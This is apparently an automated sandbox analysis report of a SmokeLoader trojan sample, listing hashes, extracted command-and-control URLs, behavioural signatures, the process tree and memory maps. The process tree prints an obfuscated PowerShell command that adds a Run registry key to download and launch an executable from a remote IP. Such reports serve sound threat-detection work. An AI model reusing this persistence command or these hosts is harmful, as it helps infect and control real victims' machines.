Analysis
-
max time kernel
147s -
max time network
183s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-08-2021 10:05
Static task
static1
Behavioral task
behavioral1
Sample
b5de39be28a0649ef87494a658668e13.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
b5de39be28a0649ef87494a658668e13.exe
Resource
win10v20210410
General
-
Target
b5de39be28a0649ef87494a658668e13.exe
-
Size
180KB
-
MD5
b5de39be28a0649ef87494a658668e13
-
SHA1
92e28e70185243da45ee2432241a58b0d4e7fda3
-
SHA256
138d79111af4f878d637e1a8dcf7dbdd46f70527eb68908ad2f977a3554031eb
-
SHA512
2065705100b75f249a6d558342b228442785c0848e027c805e7785de954d7dce93a015e4be9d1ce80a26d5e5bb22d0b4d788ee02dea22413f35a227928608e31
Malware Config
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
81C.exeBB5.exeE26.exeRuntimebroker.exe1114.exepid process 1488 81C.exe 556 BB5.exe 1556 E26.exe 1964 Runtimebroker.exe 1684 1114.exe -
Deletes itself 1 IoCs
Processes:
pid process 1256 -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
BB5.exepid process 556 BB5.exe 556 BB5.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
b5de39be28a0649ef87494a658668e13.exedescription pid process target process PID 1960 set thread context of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
b5de39be28a0649ef87494a658668e13.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b5de39be28a0649ef87494a658668e13.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b5de39be28a0649ef87494a658668e13.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b5de39be28a0649ef87494a658668e13.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b5de39be28a0649ef87494a658668e13.exepid process 1904 b5de39be28a0649ef87494a658668e13.exe 1904 b5de39be28a0649ef87494a658668e13.exe 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 1256 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1256 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
b5de39be28a0649ef87494a658668e13.exepid process 1904 b5de39be28a0649ef87494a658668e13.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 1256 1256 1256 1256 -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
pid process 1256 1256 1256 1256 1256 1256 -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
81C.exepid process 1488 81C.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
b5de39be28a0649ef87494a658668e13.exeBB5.exeE26.exeRuntimebroker.exedescription pid process target process PID 1960 wrote to memory of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe PID 1960 wrote to memory of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe PID 1960 wrote to memory of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe PID 1960 wrote to memory of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe PID 1960 wrote to memory of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe PID 1960 wrote to memory of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe PID 1960 wrote to memory of 1904 1960 b5de39be28a0649ef87494a658668e13.exe b5de39be28a0649ef87494a658668e13.exe PID 1256 wrote to memory of 1488 1256 81C.exe PID 1256 wrote to memory of 1488 1256 81C.exe PID 1256 wrote to memory of 1488 1256 81C.exe PID 1256 wrote to memory of 1488 1256 81C.exe PID 1256 wrote to memory of 556 1256 BB5.exe PID 1256 wrote to memory of 556 1256 BB5.exe PID 1256 wrote to memory of 556 1256 BB5.exe PID 1256 wrote to memory of 556 1256 BB5.exe PID 1256 wrote to memory of 1556 1256 E26.exe PID 1256 wrote to memory of 1556 1256 E26.exe PID 1256 wrote to memory of 1556 1256 E26.exe PID 1256 wrote to memory of 1556 1256 E26.exe PID 556 wrote to memory of 1964 556 BB5.exe Runtimebroker.exe PID 556 wrote to memory of 1964 556 BB5.exe Runtimebroker.exe PID 556 wrote to memory of 1964 556 BB5.exe Runtimebroker.exe PID 556 wrote to memory of 1964 556 BB5.exe Runtimebroker.exe PID 1256 wrote to memory of 1684 1256 1114.exe PID 1256 wrote to memory of 1684 1256 1114.exe PID 1256 wrote to memory of 1684 1256 1114.exe PID 1256 wrote to memory of 1684 1256 1114.exe PID 1556 wrote to memory of 1408 1556 E26.exe cmd.exe PID 1556 wrote to memory of 1408 1556 E26.exe cmd.exe PID 1556 wrote to memory of 1408 1556 E26.exe cmd.exe PID 1556 wrote to memory of 1408 1556 E26.exe cmd.exe PID 1964 wrote to memory of 948 1964 Runtimebroker.exe powershell.exe PID 1964 wrote to memory of 948 1964 Runtimebroker.exe powershell.exe PID 1964 wrote to memory of 948 1964 Runtimebroker.exe powershell.exe PID 1964 wrote to memory of 948 1964 Runtimebroker.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"C:\Users\Admin\AppData\Local\Temp\b5de39be28a0649ef87494a658668e13.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\81C.exeC:\Users\Admin\AppData\Local\Temp\81C.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\BB5.exeC:\Users\Admin\AppData\Local\Temp\BB5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
-
C:\Users\Admin\AppData\Local\Temp\E26.exeC:\Users\Admin\AppData\Local\Temp\E26.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\1114.exeC:\Users\Admin\AppData\Local\Temp\1114.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
4710cad4ef7196e4cddb126e70e58094
SHA1acce1f47d643fc630cddece0dfd5df493b963c91
SHA25687d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
SHA5122a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
-
C:\ProgramData\Runtimebroker.exeMD5
4710cad4ef7196e4cddb126e70e58094
SHA1acce1f47d643fc630cddece0dfd5df493b963c91
SHA25687d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
SHA5122a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
-
C:\Users\Admin\AppData\Local\Temp\1114.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\1114.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\81C.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\BB5.exeMD5
4710cad4ef7196e4cddb126e70e58094
SHA1acce1f47d643fc630cddece0dfd5df493b963c91
SHA25687d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
SHA5122a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
-
C:\Users\Admin\AppData\Local\Temp\BB5.exeMD5
4710cad4ef7196e4cddb126e70e58094
SHA1acce1f47d643fc630cddece0dfd5df493b963c91
SHA25687d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
SHA5122a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
-
C:\Users\Admin\AppData\Local\Temp\E26.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\E26.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\s.batMD5
40799ea8514dd78785ec9eb185e297f7
SHA14c489c83d8ec8396f385a7ab07293107b2f1a656
SHA25654be6384a6e25bf168757a3411da0e45dba7b4f930f92590c13dfaa6e50d3dc8
SHA512c54a2108eece73f9c6d4cf8f2eb0bbdfde82d66cf2ff6bd1f348b1223134b10184a20822fad2f09a5f8281a6b3048de8afcf87a2f293d49c60e3abc4d7063cde
-
\ProgramData\Runtimebroker.exeMD5
4710cad4ef7196e4cddb126e70e58094
SHA1acce1f47d643fc630cddece0dfd5df493b963c91
SHA25687d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
SHA5122a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
-
\ProgramData\Runtimebroker.exeMD5
4710cad4ef7196e4cddb126e70e58094
SHA1acce1f47d643fc630cddece0dfd5df493b963c91
SHA25687d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e
SHA5122a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57
-
memory/556-72-0x0000000002E10000-0x0000000002E4B000-memory.dmpFilesize
236KB
-
memory/556-69-0x0000000000000000-mapping.dmp
-
memory/556-81-0x0000000000400000-0x0000000002C7C000-memory.dmpFilesize
40.5MB
-
memory/948-100-0x0000000000400000-0x0000000000401000-memory.dmpFilesize
4KB
-
memory/948-101-0x00000000049B0000-0x00000000049B1000-memory.dmpFilesize
4KB
-
memory/948-102-0x0000000004970000-0x0000000004971000-memory.dmpFilesize
4KB
-
memory/948-103-0x0000000004972000-0x0000000004973000-memory.dmpFilesize
4KB
-
memory/948-96-0x0000000000000000-mapping.dmp
-
memory/1256-64-0x0000000002A20000-0x0000000002A36000-memory.dmpFilesize
88KB
-
memory/1408-94-0x0000000000000000-mapping.dmp
-
memory/1488-65-0x0000000000000000-mapping.dmp
-
memory/1556-92-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/1556-88-0x00000000033B0000-0x00000000035F3000-memory.dmpFilesize
2.3MB
-
memory/1556-74-0x0000000000000000-mapping.dmp
-
memory/1556-91-0x0000000004DB0000-0x0000000004FC1000-memory.dmpFilesize
2.1MB
-
memory/1556-89-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/1684-83-0x0000000000000000-mapping.dmp
-
memory/1684-86-0x0000000001000000-0x0000000001001000-memory.dmpFilesize
4KB
-
memory/1684-90-0x0000000004CF0000-0x0000000004CF1000-memory.dmpFilesize
4KB
-
memory/1904-60-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1904-62-0x0000000075201000-0x0000000075203000-memory.dmpFilesize
8KB
-
memory/1904-61-0x0000000000402E1A-mapping.dmp
-
memory/1960-63-0x0000000000220000-0x000000000022A000-memory.dmpFilesize
40KB
-
memory/1964-82-0x0000000000400000-0x0000000002C7C000-memory.dmpFilesize
40.5MB
-
memory/1964-78-0x0000000000000000-mapping.dmp